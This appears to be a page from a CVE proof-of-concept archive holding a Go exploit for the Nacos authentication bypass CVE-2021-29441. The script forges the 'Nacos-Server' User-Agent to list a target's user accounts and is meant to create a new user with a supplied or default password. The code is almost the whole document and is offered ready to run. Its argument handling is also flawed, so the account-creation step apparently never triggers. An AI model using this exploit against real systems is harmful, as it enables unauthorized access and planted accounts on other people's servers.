4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2021-29441.go GO
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func setRoute(u string) {
	url := u + "nacos/v1/auth/users?pageNo=1&pageSize=9"
	httpClient := &http.Client{}
	requests, err := http.NewRequest("GET", url, nil)
	requests.Header.Set("User-Agent", "Nacos-Server")
	if err != nil {
		panic(err)
	}
	res, err := httpClient.Do(requests)
	if err != nil {
		panic(err)
	}
	defer res.Body.Close()
	content, _ := io.ReadAll(res.Body)
	if res.StatusCode == 200 && strings.Contains(string(content), "pageItems") {
		res := regexp.MustCompile(`\[\{(.*)}]`)
		if res == nil {
			panic(res)
		}
		rs1 := res.FindAllStringSubmatch(string(content), -1)
		fmt.Println("[*]测试地址:" + u + "nacos")
		fmt.Println("[*]存在:", rs1[0][1])
	} else {
		fmt.Println("[!]状态码:", res.StatusCode, "检查版本是否存在漏洞范围")
	}
	defer refResh(u)
}

var username = "cve-test"
var password = "cve-test@tset"
var refresh = false

func refResh(u string) {
	if !refresh {
		return
	}
	url := u + "nacos/v1/auth/users?username=" + username + "&password=" + password
	httpClient := &http.Client{}
	requests, err := http.NewRequest("POST", url, nil)
	requests.Header.Set("User-Agent", "Nacos-Server")
	if err != nil {
		panic(err)
	}
	res, err := httpClient.Do(requests)
	if err != nil {
		panic(err)
	}
	defer res.Body.Close()
	content, _ := io.ReadAll(res.Body)
	if res.StatusCode == 200 && strings.Contains(string(content), "create user ok") {
		fmt.Println("[*]状态码:", res.StatusCode)
		fmt.Println("[*]用户:" + username + " 密码:" + password)
	} else {
		fmt.Println("[!]状态码:", res.StatusCode)
	}

}

func main() {
	logo1 := "运行: " + os.Args[0] + " ip "
	if len(os.Args) <= 1 {
		fmt.Println(logo1)
	} else {
		aa := os.Args[1]
		if aa[len(aa)-1:] == "/" {
			setRoute(aa)
		} else {
			fmt.Println("请检查url格式")
		}
		if len(os.Args) >= 3 {
			username = os.Args[2]
			refresh = true
		}
		if len(os.Args) == 4 {
			password = os.Args[3]
			refresh = true
		}
	}
}